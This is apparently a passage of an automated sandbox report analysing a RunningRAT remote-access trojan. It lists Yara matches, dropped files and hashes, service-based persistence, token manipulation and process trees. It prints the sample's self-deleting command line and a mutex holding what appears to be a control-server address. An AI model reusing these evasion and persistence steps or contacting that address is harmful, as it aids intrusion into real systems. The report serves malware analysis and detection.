            Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
            Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_8fc02c2f-d

            E-Banking Fraud

            barindex
            Checks if browser processes are running
            Source: C:\Windows\SysWOW64\svchost.exeCode function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command3_2_10002BC3

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: gE4NVCZDRk.exe, type: SAMPLEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
            Source: gE4NVCZDRk.exe, type: SAMPLEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: 3.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: 0.2.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: 7.2.SySyeu.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\6011859.dll, type: DROPPEDMatched rule: Detects RunningRAT Author: ditekSHen
            PE file contains section with special chars
            Source: gE4NVCZDRk.exeStatic PE information: section name: /|wu>
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
            PE file has a writeable .text section
            Source: XekSuT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E15CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,7_2_00E15CF1
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E140B1 NtQuerySystemInformation,7_2_00E140B1
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E15D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,7_2_00E15D6A
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E14136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,7_2_00E14136
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E15911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxWWorker,CreateActCtxWWorker,GetModuleHandleW,CreateActCtxWWorker,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,7_2_00E15911
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10001F48 strlen,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,3_2_10001F48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10001FBD LoadLibraryA,GetProcAddress,memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,WTSGetActiveConsoleSessionId,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary,3_2_10001FBD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_100025A2 ExitWindowsEx,3_2_100025A2
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\SySyeu.exeJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.iniJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.hJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.iniJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\0009\Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\PerfStringBackup.TMPJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C60761_2_003C6076
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C6D001_2_003C6D00
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\6011859.dll CC4AB82995B0C0C827E99870948EF6A1371D4D1ED6D167A087C0D5C123D0F15E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\XekSuT.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
            Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: gE4NVCZDRk.exe, 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs gE4NVCZDRk.exe
            Source: gE4NVCZDRk.exeBinary or memory string: OriginalFilename vs gE4NVCZDRk.exe
            Source: gE4NVCZDRk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: gE4NVCZDRk.exe, type: SAMPLEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: gE4NVCZDRk.exe, type: SAMPLEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 3.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.2.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 7.2.SySyeu.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: C:\Users\user\AppData\Local\Temp\6011859.dll, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: XekSuT.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: XekSuT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: XekSuT.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: classification engineClassification label: mal100.spre.bank.troj.evad.winEXE@24/33@1/3
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E13C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,7_2_00E13C66
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_003C119F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,_local_unwind2,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,ChangeServiceConfig2A,ChangeServiceConfig2A,wsprintfA,strlen,StartServiceA,3_2_10001B5B
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeCode function: 0_2_00401794 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcmpiA,CloseHandle,FreeLibrary,0_2_00401794
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E1205A CoCreateInstance,7_2_00E1205A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle,3_2_10001A43
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rarJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeMutant created: \Sessions\1\BaseNamedObjects\119.91.152.151:8321:SySyeu
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6180
            Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
            Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
            Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
            Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeFile created: C:\Users\user\AppData\Local\Temp\XekSuT.exeJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeCommand line argument: WLDP.DLL7_2_00E14136
            Source: C:\Windows\SysWOW64\SySyeu.exeCommand line argument: localserver7_2_00E14136
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: gE4NVCZDRk.exeReversingLabs: Detection: 97%
            Source: unknownProcess created: C:\Users\user\Desktop\gE4NVCZDRk.exe "C:\Users\user\Desktop\gE4NVCZDRk.exe"
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: C:\Users\user\AppData\Local\Temp\XekSuT.exe C:\Users\user\AppData\Local\Temp\XekSuT.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
            Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\SySyeu.exe C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456
            Source: C:\Windows\SysWOW64\WerFault.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: C:\Users\user\AppData\Local\Temp\XekSuT.exe C:\Users\user\AppData\Local\Temp\XekSuT.exeJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\SySyeu.exe C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThreadJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456Jump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: mfc42.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: devenum.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: msdmo.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dllJump to behavior
